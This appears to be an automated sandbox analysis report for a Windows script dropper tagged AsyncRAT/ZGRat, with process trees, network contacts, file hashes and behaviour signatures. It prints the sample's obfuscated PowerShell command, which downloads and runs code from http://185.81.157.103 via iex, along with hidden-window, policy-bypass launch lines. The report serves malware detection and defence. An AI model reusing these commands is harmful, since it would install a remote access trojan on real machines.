ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yaaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ydaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ySaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yraUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y','')|iex
C:\Windows\system32\taskeng.exe
taskeng.exe {B1F5D91D-0ECF-4114-BA10-3A0FC54202E9} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:Interactive:[1]
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"
C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Public\hich.bat" "
Network
| Country | Destination | Domain | Proto |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
Files
memory/2744-7-0x000000001B1C0000-0x000000001B4A2000-memory.dmp
memory/2744-9-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp
memory/2744-10-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2744-8-0x0000000002570000-0x0000000002578000-memory.dmp
memory/2744-11-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp
memory/2744-12-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2744-13-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2744-14-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2744-18-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp
C:\Users\Public\hich.vbs
| MD5 | 741b5b0a474f0e0cd28fd880f68723c0 |
| SHA1 | 4de5489c4e56882514b3ab432048200eae65f90d |
| SHA256 | f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23 |
| SHA512 | 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54 |
C:\Users\Public\hich.bat
| MD5 | 6c8a34a94e068b809145df09acbe153c |
| SHA1 | 0ec5c6964c6ccc949af47297eb9794f8f1ee4724 |
| SHA256 | c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003 |
| SHA512 | 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 25af3af8f786943d78326df1a84fd5df |
| SHA1 | 331aa1b11635d06c4ab3e292139e134c3f907113 |
| SHA256 | 6058dfc7bbbaac27a77299952669de5145c7a3277dcf3e46f8af4e4eac87f29a |
| SHA512 | d32a51522562117700a735e1af0ae279528a3e668ee753cb1b45dfe9422a3bc184a9ba4c94c12dc78c73b8324d3b392f5e1e478cfec066333e4170f342f06f90 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J8RF7N5OGWR5H3BR9IKQ.temp
| MD5 | ce37b88de003d46be6fb52b722efd721 |
| SHA1 | 9817eb666450d67d8d1a96ba8d99b760132bc856 |
| SHA256 | a9f696a8992cbb6984933405c456d49c2e97adc9e98a2f8ee6e88f6a7f5a5fd1 |
| SHA512 | f93ee23a0ab7b0574fba19eced9e7d835627c09d0ee0bfab7f4239c2f4b53ad374de3498c282776082b551c30e09b82c56aaca574eea8c23e44b33d86aa56ada |
memory/1316-28-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp
memory/1316-29-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/1316-27-0x00000000025E0000-0x00000000025E8000-memory.dmp
memory/1316-26-0x000000001B200000-0x000000001B4E2000-memory.dmp
memory/1316-30-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp
memory/1316-33-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/1316-32-0x0000000002450000-0x00000000024D0000-memory.dmp
C:\Users\Public\hich.ps1
| MD5 | b13a273e32d5763a07d712e5209055fa |
| SHA1 | 633dd0e5f647fee13536f74247159cdb07d72273 |
| SHA256 | 2c9c01e49757fa9a9732a3e9a1f06fb785afe6f288382458d4e6bbf0adee3486 |
| SHA512 | 8b50f49dfd641467b7c11363d221c790e99b41aa4fdd97befb8c7deb1516584774690ab2b9ee4be951d162d9a56d57586af1d49d39a6f6f97a8a3b1fbc432908 |
memory/1316-31-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/1316-35-0x000000001B600000-0x000000001B634000-memory.dmp
memory/1316-36-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/1316-37-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-23 12:29
Reported
2024-01-23 12:31
Platform
win10v2004-20231215-en
Max time kernel
143s
Max time network
147s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4216 set thread context of 1144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y(aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yGaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yM *aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y-aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yOaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y*aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y)NaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y.aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼